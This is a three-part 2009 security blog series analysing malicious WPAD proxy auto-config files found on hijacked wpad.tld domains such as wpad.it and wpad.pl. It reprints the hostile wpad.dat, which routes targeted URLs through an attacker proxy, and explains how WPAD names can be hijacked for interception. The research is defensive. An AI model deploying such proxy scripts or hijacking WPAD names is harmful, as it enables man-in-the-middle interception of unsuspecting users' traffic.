Posts Tagged dns
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part III
Posted by Jacopo Corbetta in Security on May 30, 2009
Some weeks ago I (Jacopo Corbetta) and Luca Invernizzi wrote about a curious Man-In-The-Middle potential attack exploting flaws in the Web Proxy Automatic Discovery (WPAD) and DNS protocols. Long story short, if you register a wpad.domain name you might be able to perform a very stealthy Man-In-The-Middle attack. Now, DNS is complicated and programs are buggy, so hijacking a wpad.Top-Level-Domain name like wpad.com (or wpad.it or (!) wroclaw.pl) could expose a lot of computers to your attack.
You might recall that I was puzzled by the content of wpad.it/wpad.dat and wondered what Italian sites were targeted. Then Luca pointed out it was registered by a polish guy, and that he identified one of the possible targets as systempartnerski.pl.
We had in mind to run some analysis and then alert the registrars before posting again, but since the WPAD topic got attention on BugTraq yesterday it may be more timely to publish our results now.
UPDATE: The wpad.dat served by the polish guy changed! It appears they removed the site identified by Luca! The file was still in the original form when we reported our findings to the Italian security mailing list sikurezza.org (see this message posted on 21/05, Alessandro posted our results on 18/05). This thing is getting interesting... Anyway, here’s the new file:
function FindProxyForURL(url, host) { //regular expressions supported? if ( shExpMatch(url, "http*//*g*ad*nd*c*m*sh*ds*js") ) return "PROXY 72.55.164.182:80"; return "DIRECT"; } |
Hunting for WPAD exploits
As we wrote before, the only reliable list of effective top level domains is the one used in the Mozilla code, publicly maintained at publicsuffix.org. Each of these domains — if registered — could hide a malicious wpad.dat with potentially wide reach.
We think security-conscious DNS registrars should deny any request for these names — regardless of whether the underlying WPAD vulnerability is widespread or not, we should do everything in our power to reduce the attack potential.
In our first random probes, we found the same strange wpad.dat on wpad.it, wpad.cz and wpad.pl But then we got curious: how common is this problem? How many wpad.dats are found in the wild? So I wrote a small python script which attempted to resolve all wpad.tld names and to retrieve the associated wpad.tld/wpad.dats.
The TLD menace
There are something like 3370 top-level-domains in the publicsuffix.org list. 122 wpad.top-level-domain are actually registered and return an IP address. 62 of them return data when asked for a wpad.dat over HTTP.
11 of those wpad.dats look like generic “domain parking” pages. I am not completely sure, since I don’t speak all those languages. Here’s the list:
.ar.com .cm .gouv.rw .ph .st .tv .cg .co.st .kiev.ua .rw .tk
The wpad.cn/wpad.dat and wpad.net.ua/wpad.dat also look like some kind of redirect pages. This brings the total of innocuous1 domains to 13.
The wpad domains for Switzerland and Liechtenstein (.ch and .li) return a “neutral” wpad.dat (that is, no proxy for any URL). For .tsaritsyn.ru and .volgograd.ru an empty file is returned. I don’t know if this means that the wpad domain name was claimed by some good guy (like the one who registered wpad.com, for example). To be completely sure we would need to perform the query from Switzerland or Russia.2
The wpad.dats for vn.ua, ptz.ru and karelia.ru look quite complicated and might even be legitimate proxying attempts by a regional ISP. Additional investigation would be required. Here are the files.
The remaining 42 wpad domains were serving exactly the same wpad.dat file (now they have changed it! See our update on top) (indented for clarity):
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
All of these domains look have probably been registered by the same guy (even if WHOIS records are inconclusive). The whois for wpad.pl even has his name (don’t know if it is accurate, though, so we’ll avoid posting names). Here is the list of affected domains:
.asia .at .be .bialystok.pl .biz.pl .bydgoszcz.pl .cc .co.at .com.es .com.pl .com.tw .cz .edu.pl .es .in .it .katowice.pl .name .net.cn .net.in .net.pl .nom.es .olsztyn.pl .opole.pl .org.cn .org.es .org.in .org.pl .org.tw .pl .radom.pl .ro .rzeszow.pl .sk .slask.pl .szczecin.pl .tw .warszawa.pl .waw.pl .wroclaw.pl .ws .zgora.pl
As you can see, our friend has been able to grab the global wpad domain for 12 countries including Poland, Italy, Spain, Austria, Belgium, the Czech Republic, Romania and India.
Final thoughts and mysteries
The most obvious recommendation is that you register wpad.yourdomain.com in your organization DNS (e.g. since our beloved school has sssup.it and we administrate the allievi.sssup.it subdomain, we have associated wpad.allievi.sssup.it with a meaningless IP and we’ll recommend the network staff to do the same with wpad.sssup.it). This will immediately stop the search for a wpad.dat by your clients.
We would also recommend registrars to delete wpad.domain entries or at least to avoid accepting new ones. As time allows (the exam session is near!) we’ll bring this matter to the attention of the registrar admins, let’s hope they listen to us. If someone with a big name is reading this (cool!), you might wish to contact some DNS authorities.
While Luca cracked the second wildcard expression (http*//*s*st*mp*tn*sk*p*), we still have no idea about which sites are targeted by the first one (http://*g*ad*nd*c*m*sh*ds*js, maybe a JavaScript file?). And why did they use such a wide exclusion pattern (http*//*n*o.*) in the original file? Also, the proxy isn’t working for us — maybe they are answering only to IPs in Poland?
Now that some days ago the polish guys changed their wpad.dat we wonder what should be our next move... and what will be their next move! We’ll post updates here, so stay tuned.
- The wpad.dat file has to be in a special Java-Script like format, see findproxyforurl.com for details [↩]
- The wpad.ch server might be serving a harmless wpad.dat to foreign hunters and a malicious one to domestic victims (of course, this applies to all domains in this list — with the possible exception of Italy, our home country) [↩]
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II
Posted by Luca Invernizzi in Security on May 14, 2009
After reading Jacopo’s article on WPAD, I’ve tried to understand the Italian global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
The proxy
First thing that concerned me is that the IP address used as proxy is polish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl
It’s registered to a guy in Wloclawek, and it’s been up since December 2008, so it’s pretty new. The hosted site is syndacated, which it’s usually a fishy sign.
The syntax
The scripts provides a fall back policy to direct connection to avoid server overload, as described in wikipedia
return "PROXY 72.55.164.182:80; DIRECT" |
The regular expression
I’ve downloaded Alexa top 1-million sites list, which is daily updated, and I discovered that the second regular expression,
"http*//*s*st*mp*tn*sk*p*" |
gets one and only one match: a polish internet trading site.
$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p" 154967,systempartnerski.pl |
The first regular expression, even without the initial and final part, does not match any site in Alexa first million.
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I
Posted by Jacopo Corbetta in Security on May 13, 2009
The network here at Sant’Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continously trying to reach the inexistent WPAD.SSSUP.IT machine.
I got curious, looked up what WPAD is, and found a couple of interesting things.
What the heck is this WPAD thing?
It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for www proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Automatic Discovery Protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE proxy settings, so the Man-In-The-Middle potential is very high.
Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat 1, which should contain a Javascript-like function called FindProxyForURL. The function can use wildcard matching to specify different proxies for different addresses. All the gory details are available at www.findproxyforurl.com.
Exploiting WPAD
Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to setup a wpad host for their domain, Windows may try to query in multiple ways — even by broadcasting a NetBIOS request, which is trivial to intercept on a local network.2
Now, auto-configuration of network parameters is very useful. Tools like DHCP and trasparent proxies are in wide use. However, this kind of auto-configuration brings risks: rogue DHCP servers can be transparent to users and possibly avoid detection. DHCP is a very well known protocol and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is — in comparison — a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
The DNS beast
As you might have guessed, Windows should stop short of the top-level domain .com in its quest for a wpad.dat. However, two issues come into play:
- On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
- Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.
Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the specific domain name. It is not immediately obvious, for instance, that pi.it is a global TLD (reserved for the italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.
There is no “good” solution to this problem. Mozilla developers ended up creting a list of “Effective TLDs“3 which the browser treats like global TLDs.
Each item on this list is an exploit opportunity for the WPAD bug. Just register the wpad.it domain and you potentially have control of all buggy machines with a .it name
Attack on Italy: the wpad.it mistery
You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.
Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.
But take a look at this, the global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
What the hell is this? It appears the attacker is targeting some specific websites, but the wildcard is quite complicated. Any idea of what it might be?
UPDATE: found this same file on wpad.cz, full analysis in progress.
UPDATE: a more in depth analysis here and here
- Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), inTechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format. [↩]
- Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick. [↩]
- Browsers need this list to enforce cookie restrictions (what if someone was able a cookie on all “.co.uk” domains?). The list is now publicly maintained at publicsuffix.org. [↩]